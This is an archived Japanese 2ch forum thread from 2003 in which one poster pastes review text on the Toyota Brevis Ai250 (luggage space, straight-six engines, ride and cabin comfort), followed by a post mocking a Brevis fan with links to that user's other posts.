プログレによって具体化した新FRパッケージは、ホイールベースを最大限に延長し、ボディ全高も高めに設定することでスペース効率を向上させるとともに、前後重量配分を改善して走りの質を引き上げようというもの。
そのメリットを生かすと、プログレのような小さな高級車が誕生するのだ。
実は、このブレビスもコンセプトはプログレと同じ。
ただし、内外観のイメージチェンジによって、プログレにはない若々しさを獲得している。

83 :ブレビス Ai250 ラゲッジスペース:03/07/23 13:32 ID:eNMPdkgP
そもそも新FRパッケージは、燃料タンクを後席クッションの下に置くことが特徴となるため、ラゲッジスペースが広くできるのだ。
しかもブレビスの場合にはプログレよりもリアのオーバーハングが20mm長く、トランクリッドの高さを上げたハイデッキスタイルを採用している。
そのため、プログレよりもさらに18リッター多い440リッターの容量を確保。
なおかつ、リアのアームレスト部で室内とつながるトランクスルー式にもなっている。

84 :ブレビス Ai250 エンジン&パフォーマンス:03/07/23 13:34 ID:eNMPdkgP
ブレビスは、2.5リッターと3リッターの直列6気筒エンジンを用意している。
どちらも直噴のD-4エンジンであり、それぞれ200馬力と220馬力を発揮。
ミッションは、4WD仕様を除いて5速ATを(4WD仕様は4速)を組み合わせている。
もちろん、エンジンとの高度な統合電子制御を行うスーパーECT付きだ。
さっそく走らせてみるとD-4エンジンは回転数に関わりなく、いつどのタイミングでアクセルを踏んでも豊かなトルクを立ち上げる。
それは、2.5リッターも3リッターも同じだ。
同じ力強さを得ようとするときに2.5リッターの方が少しだけ多くアクセルを踏むことを要求するといった程度の違いでしかない。
2.5リッターのアクセルを多く踏んだとしても、力強さとともに荒々しさが伝わるような心配は一切なく、プログレ同様に“小さな高級車”ならではの上質な走りを実感させてくれる。
ただ、より味わい深いというか、全体としての余裕を感じるのは3リッターの方だ。
アクセルに足を乗せる程度の踏み方ですべてが完結するような余裕を期待する人向けの選択といえる。
とはいうものの、このエンジンは回転数に頼って走っても気持ちいい。
直列6気筒エンジンらしく吹け上がりがスムーズであり、高回転域まで伸びのある加速を示してくれる。
5速ATをマニュアル操作したときの応答性も小気味よく、2速と3速を使い分けながら走ると、スポーティさが確かめられる。
そうした走りに応えるように、サスペンションの設定もプログレとは別物。
ステアリング操作に対する応答性が正確であり、オプションの17インチタイヤを履くとその特性が一層際立つ。
それでいて、快適性を犠牲にしていないところがブレビスの魅力だ。

85 :ブレビス Ai250 居住性:03/07/23 13:35 ID:eNMPdkgP
ブレビスはとにかく快適なクルマであり、飛ばし気味に走らせたとしても、エンジン音が大きめに感じることはない。
アクセルを一定に保っていれば、明らかにできないようなスピードを出しているときでも静粛性が高い。
そこから再加速しても、エンジンがうなりを上げるといった変化は示さない。
乗り心地もしなやかだ。
路面からの衝撃はタイヤとサスペンションでほぼ完ぺきに吸収。
それでも残った突き上げ感の類は剛性の高いボディが抑え込むといった、ドイツ車的な硬質感さえ獲得している。
たとえオプションの17インチタイヤを履いていても、その固さを意識することさえない。
室内の広さも文句なしだ。
ボディサイズを考えれば、後席の広さは感動的でさえある。
大人4名が高級車らしい余裕を味わうことができる広さを得ている。
しかも、質感が極めて高い。
デザイン的な洗練度も高く、この点ではドライバーを大いに満足させるはずだ。

86 :名無しさん@そうだドライブへ行こう:03/07/23 13:49 ID:R/J0Lxvs
痛いブレビス海苔がいるスレはここですか?
ID:213QFgBf

http://hobby2.2ch.net/test/read.cgi/auto/1044891765/940
http://hobby2.2ch.net/test/read.cgi/auto/1057573218/57
http://hobby2.2ch.net/test/read.cgi/auto/1057369231/428
http://hobby2.2ch.net/test/read.cgi/auto/1054987950/957
http://hobby2.2ch.net/test/read.cgi/auto/1057584661/531
http://hobby2.2ch.net/test/read.cgi/auto/1058319240/602
http://hobby2.2ch.net/test/read.cgi/auto/1056443989/718
http://hobby2.2ch.net/test/read.cgi/auto/1055851428/169
http://hobby2.2ch.net/test/read.cgi/auto/1057920167/958
http://hobby2.2ch.net/test/read.cgi/auto/1053171523/908
http://hobby2.2ch.net/test/read.cgi/auto/1051636728/544
http://hobby2.2ch.net/test/read.cgi/auto/1055620357/442
http://hobby2.2ch.net/test/read.cgi/auto/1054380193/105




37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)